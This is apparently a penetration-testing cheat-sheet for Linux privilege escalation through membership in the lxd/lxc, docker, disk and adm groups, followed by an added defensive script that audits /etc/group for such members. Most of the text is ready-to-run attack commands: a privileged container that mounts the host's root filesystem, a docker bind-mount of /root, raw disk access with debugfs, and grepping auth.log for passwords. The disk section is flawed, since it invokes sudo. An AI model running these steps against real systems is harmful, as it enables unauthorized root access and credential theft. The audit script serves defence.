9. Privileged groups

# LXD/LXC Privilege Escalation

# 1. Check group membership
id

# 2. (If necessary) Download Alpine image
wget <alpine_image_url>
unzip alpine.zip
cd 64-bit\ Alpine/

# 3. (If necessary) Initialize LXD
lxd init
# (choose the defaults or customize as needed)

# 4. Import Alpine image
lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine

# 5. Create privileged container
lxc init alpine r00t -c security.privileged=true

# 6. Mount host filesystem
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true

# 7. Start container and get shell
lxc start r00t
lxc exec r00t /bin/sh

# 8. Access host as root
cd /mnt/root/root
id # Should show root privileges

# Docker Privilege Escalation

# 1. Check group membership
id

# 2. Run a container with the host's /root bind-mounted (docker group membership is root-equivalent)
docker run -v /root:/mnt -it ubuntu

# 3. Access host's root directory
cd /mnt
ls -la # View contents of host's /root

# Disk Group Privilege Escalation

# 1. Check group membership
id

# 2. Identify disk device (e.g., /dev/sda1)
lsblk

# 3. Use debugfs (requires root or sudo for initial mount)
sudo debugfs -w /dev/sda1

# 4. (Inside debugfs) Browse the filesystem
ls
cat <file_path>
# ... other debugfs commands as needed
q  # quit debugfs

# ADM Group Information Disclosure

# 1. Check group membership
id

# 2. Read log files
ls -la /var/log/
cat /var/log/syslog
cat /var/log/auth.log
cat /var/log/apache2/access.log # or nginx logs
# ... and other relevant log files

# Example of reading a specific log file for a specific string
grep "password" /var/log/auth.log

Important Notes:

  • LXD/LXC:
    • You might need to adjust the image name and path based on your setup.
    • If lxd init fails because of bridge configuration, you might need root privileges to configure the bridge.
  • Docker:
    • Ensure Docker is installed and running.
    • The -v option bind-mounts a host path into the container. Adjust the source and destination paths as needed.
  • Disk:
    • debugfs requires caution: -w opens the device read-write, and incorrect usage can damage the filesystem.
    • You might need root or sudo privileges to initially mount the device.
  • ADM:
    • Log files can contain sensitive information. Handle them responsibly.
    • Log locations vary with the installed services.
  • GTFOBins:
    • Remember to check GTFOBins for updated information and alternative methods.
  • Adaptation:
    • These commands are a starting point. Adapt them to your specific target environment.
  • Security:
    • Use these techniques responsibly and ethically. Only use them on systems you have explicit permission to test.
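Every section above starts from group membership, so the defender-side check is to audit who holds it. The following is an added example, not part of the original cheat-sheet: it lists every account in the lxd, lxc, docker, disk and adm groups from a file in /etc/group format (the constructed sample file and the chosen group list are this example's assumptions).

```shell
#!/bin/sh
# Audit helper (added example): report every account that is a member of a
# group the cheat-sheet treats as root-equivalent. Reads a file in /etc/group
# format so it can be pointed at a copy pulled from another host.

# Groups covered by the sections above. adm only grants log reads, but is
# listed because logs may hold credentials.
RISKY_GROUPS="lxd lxc docker disk adm"

# Print "group:user" for each member of a risky group found in $1
# (default /etc/group). Only supplementary membership (fourth field of
# /etc/group) is covered; primary groups from /etc/passwd are not.
risky_members() {
    groupfile="${1:-/etc/group}"
    awk -F: -v risky="$RISKY_GROUPS" '
        BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) want[r[i]] = 1 }
        ($1 in want) && $4 != "" {
            m = split($4, users, ",")
            for (j = 1; j <= m; j++) print $1 ":" users[j]
        }' "$groupfile"
}

# Constructed sample group file (not from any real host), used by --demo.
sample_group_file() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
root:x:0:
adm:x:4:syslog,alice
disk:x:6:
sudo:x:27:alice
docker:x:999:bob
lxd:x:998:alice,bob
users:x:100:alice,bob,carol
EOF
    printf '%s\n' "$f"
}

# Run with --demo to audit the constructed sample; run with no arguments
# (or a path) to audit a real group file.
if [ "${1:-}" = "--demo" ]; then
    f=$(sample_group_file)
    risky_members "$f"
    rm -f "$f"
elif [ -n "${1:-}" ]; then
    risky_members "$1"
fi
```

Any account the script prints that is not a deliberately trusted administrator should be removed from the group, since membership is equivalent to root on that host.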
